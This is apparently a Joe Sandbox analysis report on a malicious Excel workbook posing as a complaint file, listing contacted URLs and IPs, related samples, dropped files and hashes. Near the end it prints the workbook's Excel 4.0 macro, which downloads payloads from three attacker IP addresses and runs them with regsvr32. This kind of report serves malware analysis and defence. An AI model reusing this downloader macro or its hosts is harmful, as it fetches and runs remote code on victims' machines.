                                                                                                                            https://login.windows.net/common/oauth2/authorizeSEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json$EXCEL.EXE, 00000000.00000002.981591144.00000000128C3000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://entitlement.diagnostics.office.comEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeVEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://login.windows.net/common/oauth2/authorizeWEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://login.windows.net/common/oauth2/authorizeHEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://login.mcroEXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.982109381.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975647498.0000000012A2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeIEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://outlook.office.com/EXCEL.EXE, 00000000.00000003.712956120.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844792206.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980144579.000000000D3B2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656130823.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885932857.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830927828.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843000292.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728531297.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792438393.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829149171.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843806955.0000000012A43000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://login.windows.net/common/oauth2/authorizeKEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workUEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  190.14.37.101
                                                                                                                                                  		unknownPanama
                                                                                                                                                  		52469OffshoreRacksSAPAfalse
                                                                                                                                                  185.138.164.244
                                                                                                                                                  		unknownGermany
                                                                                                                                                  		50451DEPTELECOMNSO-ASRUfalse
                                                                                                                                                  185.81.114.236
                                                                                                                                                  		unknownUnited Kingdom
                                                                                                                                                  		59711HZ-NL-ASGBfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                  Analysis ID:532936
                                                                                                                                                  Start date:02.12.2021
                                                                                                                                                  Start time:21:01:17
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 6m 22s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:ComplaintDetails-1244065104-Nov-17.xlsb
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:17
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal92.expl.evad.winXLSB@7/6@0/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:Failed
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsb
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.109.32.63, 52.109.76.36
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Execution Graph export aborted for target EXCEL.EXE, PID 6316 because there are no executed function

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  190.14.37.101ComplaintDetails-1244065104-Nov-17.xlsbGet hashmaliciousBrowse
                                                                                                                                                    185.138.164.244ComplaintDetails-1244065104-Nov-17.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.138.164.244/44532.8710387731.dat
                                                                                                                                                    185.81.114.236ComplaintDetails-1244065104-Nov-17.xlsbGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      DEPTELECOMNSO-ASRUComplaintDetails-1244065104-Nov-17.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.244
                                                                                                                                                      setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.46
                                                                                                                                                      10KaQvX7O7.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      mG5GGD3Pm6.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      ___ __ 9_.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      mAISpSSZ7f.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      eLZzxG56uH.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      SKM_C258.EXEGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      CPHB7Z2buG.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      aylGgMNibQ.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      V3fm0d84mp.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      Aqlmlmmeey.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      6lGJNtdKHt.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      nGiDZ9ZC2d.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      xx2wsaL3cJ.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      75fcGkVO1k.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      8aAG42oIjb.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      Zq0u07ZGkg.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      jUV82t8dgh.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      SecuriteInfo.com.W32.AIDetect.malware1.14529.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.138.164.150
                                                                                                                                                      OffshoreRacksSAPAComplaintDetails-1244065104-Nov-17.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.101
                                                                                                                                                      ContractCopy-2007317195-Nov-18.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.186
                                                                                                                                                      ContractCopy-2007317195-Nov-18.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.186
                                                                                                                                                      Srv-Interrupt-95268364-Nov-10.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.9
                                                                                                                                                      Srv-Interrupt-95268364-Nov-10.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.9
                                                                                                                                                      rzdYBz3qEl.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.186
                                                                                                                                                      PRSM 15433.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.182
                                                                                                                                                      PRSM 15433.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.182
                                                                                                                                                      CLMCP 9215 Nov 15 (374).xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.84
                                                                                                                                                      CLMCP 9215 Nov 15 (374).xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.84
                                                                                                                                                      CLMCP 9215 Nov 15 (383).xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.84
                                                                                                                                                      CLMCP 9215 Nov 15 (383).xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.84
                                                                                                                                                      11008767374-11112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.89
                                                                                                                                                      11008767374-11112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.89
                                                                                                                                                      1359055027-11112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.89
                                                                                                                                                      1359055027-11112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.89
                                                                                                                                                      1359055027-11112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.89
                                                                                                                                                      11625955776-11112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.89
                                                                                                                                                      Compl-598085012-Nov-08.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.28
                                                                                                                                                      1589557877-11112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.89

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\630E636C-6B0C-44EA-BF33-295CC8DCC16C
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):140352
                                                                                                                                                      Entropy (8bit):5.3574479066156995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:NcQIfgxrBdA3gBwtnQ9DQW+zUb4Ff7nXmvid1XiE6LWmE9:XuQ9DQW+zfXfH
                                                                                                                                                      MD5:7041F82342CA3BB77AC6E03BBA053D21
                                                                                                                                                      SHA1:662834DC1DBB8F985F52FBAF66F0232208FDEE8E
                                                                                                                                                      SHA-256:2F4093011968416889176D93F5AA2288351E7015B11BAE20557FA3380805F079
                                                                                                                                                      SHA-512:E25A46182FC97AC042D04E15891D6E96DC992FD45F38132A69D1C1EE14872D345DC917002F4B573AF7F6C78550BB9B7AE2C04AA928E2198FADD23C12DC90CFE2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T20:02:09">.. Build: 16.0.14729.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\227F60C2.jpg
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1098x988, frames 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):85681
                                                                                                                                                      Entropy (8bit):7.915850776614707
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit
                                                                                                                                                      MD5:4F100E2CEFED046B44EC799015B454EF
                                                                                                                                                      SHA1:5149E5D1B5212C77B3548914E9B47D67B4BEA574
                                                                                                                                                      SHA-256:D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C
                                                                                                                                                      SHA-512:153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: ......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm...........J..".................................................".............................................................q.[..+...*...K.... ..............?.......g....6..)....=~....................w5...........7_.-.......k.../...;.........!.z%o..w!....,.............?...Gs?.].......C..P~i.._.=..`....{...w....."..-........:..d.....................;z7)...~g........C....v..\..O.....0...v........v... ............A...;.~Y.}.....MsC.~..5..?.;.........V7....G...b..~...........@................O.}...o4.s_...z78.1.yl...X~.u..~..S....J..V~S..x.u~.. ..............@....u..m....rGrf.P.._+Z..?AW..~..u.G....................o&..................................................................9.0...H.Zx...M.y.[kW..o......;.....z......}v.m..[R.i....R..m....+.J............r6.P....|s..].vO._.}..K.]-V.U=9}........W......3.....G.t}Y
                                                                                                                                                      C:\Users\user\Desktop\74E50000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):97123
                                                                                                                                                      Entropy (8bit):7.832617738018424
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:eB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUoIHz:pc6EehCfCZpUHKGXbBKsiiEHz
                                                                                                                                                      MD5:6C82071E9F05B57CCD14462B49635CDF
                                                                                                                                                      SHA1:CE666804DF7779E970D76D1AA64DB0F52543AEE2
                                                                                                                                                      SHA-256:6C78C9C018C06F23A2936176B6D1BCBDCA054E21B86A4EC5007EE3ED62279EFE
                                                                                                                                                      SHA-512:E8FB6BA91AFA9E74502D16834274E3F4E531980F1A00F0869DFAD0B9B65C221EE35D6CD6697B476C443690FC6ECCA522EFB67A47579C105D76F051F633916F15
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: PK..........!..E.....~.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=......q-1.H..I..v.V.....z..g8Z......!....K....6..F...R.....F...;@q.~.fu.....=6.'.....A...<?.4h....._..u.X.Wm...j..b..........J....{Y..:Fg[M.P.....m.Nb.@..:.......s..hfQG..8|A......ddY..6.;.9...L;....n..CN.>B..~.n%k.....Q[.....*...e.e.6.cF.e9Sj..Wo`;K.q........5^...w...O.T9...n.v...6........,4O.(......G....u.sC...<...'.L.3.:..>....YEvD.n.....i....@.......T ...)D.y.`~g..VF.. ...u.
                                                                                                                                                      C:\Users\user\Desktop\74E50000:Zone.Identifier
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):26
                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                      C:\Users\user\Desktop\ComplaintDetails-1244065104-Nov-17.xlsb (copy)
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):97123
                                                                                                                                                      Entropy (8bit):7.832617738018424
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:eB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUoIHz:pc6EehCfCZpUHKGXbBKsiiEHz
                                                                                                                                                      MD5:6C82071E9F05B57CCD14462B49635CDF
                                                                                                                                                      SHA1:CE666804DF7779E970D76D1AA64DB0F52543AEE2
                                                                                                                                                      SHA-256:6C78C9C018C06F23A2936176B6D1BCBDCA054E21B86A4EC5007EE3ED62279EFE
                                                                                                                                                      SHA-512:E8FB6BA91AFA9E74502D16834274E3F4E531980F1A00F0869DFAD0B9B65C221EE35D6CD6697B476C443690FC6ECCA522EFB67A47579C105D76F051F633916F15
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: PK..........!..E.....~.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=......q-1.H..I..v.V.....z..g8Z......!....K....6..F...R.....F...;@q.~.fu.....=6.'.....A...<?.4h....._..u.X.Wm...j..b..........J....{Y..:Fg[M.P.....m.Nb.@..:.......s..hfQG..8|A......ddY..6.;.9...L;....n..CN.>B..~.n%k.....Q[.....*...e.e.6.cF.e9Sj..Wo`;K.q........5^...w...O.T9...n.v...6........,4O.(......G....u.sC...<...'.L.3.:..>....YEvD.n.....i....@.......T ...)D.y.`~g..VF.. ...u.
                                                                                                                                                      C:\Users\user\Desktop\~$ComplaintDetails-1244065104-Nov-17.xlsb
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                      Entropy (8bit):7.8328127669623
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel Office Binary workbook document (40504/1) 83.51%
                                                                                                                                                      • ZIP compressed archive (8000/1) 16.49%
                                                                                                                                                      File name:ComplaintDetails-1244065104-Nov-17.xlsb
                                                                                                                                                      File size:97289
                                                                                                                                                      MD5:cfee2afbf9c7456b62417ccf80e70009
                                                                                                                                                      SHA1:2d43d6ad54fb33ce77467394e621963d528cc57f
                                                                                                                                                      SHA256:0a7656fab771936b9586b8b90ebe9d38f34fa64d8e465f3f53c4df20f3c1ca44
                                                                                                                                                      SHA512:0e34e23fc57dbaf8dabb479beded8c3b79b49d09f752472c68c924a5c1e4495d9dff24be0ea62652c4f1c5a46ff8c833bc17d72323fcb0105204c6c2c5146b62
                                                                                                                                                      SSDEEP:1536:smepB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUNp:rc6EehCfCZpUHKGXbBKsiii
                                                                                                                                                      File Content Preview:PK..........!...$7....~.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "ComplaintDetails-1244065104-Nov-17.xlsb"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      17,3,uRlMon
18,3,="URLDownloadTo"
19,3,JJCCBB
20,4,="http://190.14.37.101/"
21,4,="http://185.81.114.236/"
21,6,=NOW()
22,4,="http://185.138.164.244/"
22,6,.dat
23,6,.dat2
24,6,=REGISTER(Tiposa!D18,Tiposa!D19&"FileA",Tiposa!D20,"Ropaasf",,1,9)
25,6,=Ropaasf(0,E21&G22&G23,"..\Tot1.ocx",0,0)
26,6,=Ropaasf(0,E22&G22&G23,"..\Tot2.ocx",0,0)
27,6,=Ropaasf(0,E23&G22&G23,"..\Tot3.ocx",0,0)
28,6,=Ropaasf(0,E24&G22&G24,"..\Tot4.ocx",0,0)
29,6,=Ropaasf(0,E25&G22&G24,"..\Tot5.ocx",0,0)
30,6,=Ropaasf(0,E26&G22&G24,"..\Tot6.ocx",0,0)
35,6,=EXEC("regsvr32.exe  ..\Tot1.ocx")
36,6,=EXEC("regsvr32.exe ..\Tot2.ocx")
37,6,=EXEC("regsvr32.exe ..\Tot3.ocx")
45,6,=HALT()

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

